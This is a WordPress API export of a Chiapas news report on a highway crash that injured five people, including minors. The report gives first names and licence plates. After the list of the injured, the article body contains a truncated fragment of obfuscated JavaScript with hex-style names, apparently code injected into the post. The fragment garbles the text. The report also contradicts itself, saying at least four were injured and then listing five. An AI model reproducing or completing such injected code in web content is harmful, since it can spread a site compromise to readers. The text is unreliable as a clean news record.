{"id":19475,"date":"2024-12-27T03:07:35","date_gmt":"2024-12-27T03:07:35","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=19475"},"modified":"2024-12-27T03:07:36","modified_gmt":"2024-12-27T03:07:36","slug":"cinco-lesionados-entre-ellos-dos-menores-tras-choque-en-la-carretera-san-cristobal-tuxtla","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=19475","title":{"rendered":"Cinco lesionados, entre ellos dos menores, tras choque en la carretera San Crist\u00f3bal-Tuxtla"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"728\" data-id=\"19476\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/IMG-20241226-WA0044-1024x728.jpg\" alt=\"\" class=\"wp-image-19476\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/IMG-20241226-WA0044-1024x728.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/IMG-20241226-WA0044-300x213.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/IMG-20241226-WA0044-768x546.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/IMG-20241226-WA0044.jpg 1179w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Oscar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>26 de diciembre del 2024. San Crist\u00f3bal de Las Casas.- Un accidente vehicular ocurrido este mi\u00e9rcoles en el kil\u00f3metro 23 de la carretera San Crist\u00f3bal-Tuxtla Guti\u00e9rrez dej\u00f3 un saldo de al menos cuatro personas lesionadas, entre ellos dos menores de edad.<\/p>\n\n\n\n<p>El percance involucr\u00f3 a dos veh\u00edculos: un Volkswagen Jetta azul con placas DMB 744F y un Volkswagen Vento gris con placas DSU 020C, ambos del estado de Chiapas.<\/p>\n\n\n\n<p>De acuerdo con los primeros reportes, el choque provoc\u00f3 tr\u00e1fico lento en la zona, afectando a decenas de conductores que circulaban por esta v\u00eda. Personal de emergencia acudi\u00f3 al lugar para brindar atenci\u00f3n a los heridos y trasladarlos a un hospital cercano para su valoraci\u00f3n m\u00e9dica.<\/p>\n\n\n\n<p>Los lesionados son Dalia Vanessa \u201cN\u201d, Karla Maria \u201cN\u201d, Maria Jose \u201cN\u201d trasladadas al pedi\u00e1trico de Tuxtla Guti\u00e9rrez, as\u00ed como Carlos Jes\u00fas \u201cN\u201d , Gloria Isabel \u201cN\u201d trasladados al Hospital G\u00f3mez Maza<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Oscar G\u00f3mez\/ Corresponsal 26 de diciembre del 2024. San Crist\u00f3bal de Las Casas.- Un accidente vehicular ocurrido este mi\u00e9rcoles en el kil\u00f3metro 23 de la carretera San Crist\u00f3bal-Tuxtla Guti\u00e9rrez dej\u00f3 un saldo de al menos cuatro personas lesionadas, entre ellos dos menores de edad. El percance involucr\u00f3 a dos veh\u00edculos: un Volkswagen Jetta azul con &hellip;<\/p>\n","protected":false},"author":2,"featured_media":19476,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-19475","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19475","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=19475"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19475\/revisions"}],"predecessor-version":[{"id":19477,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19475\/revisions\/19477"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/19476"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=19475"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=19475"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=19475"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}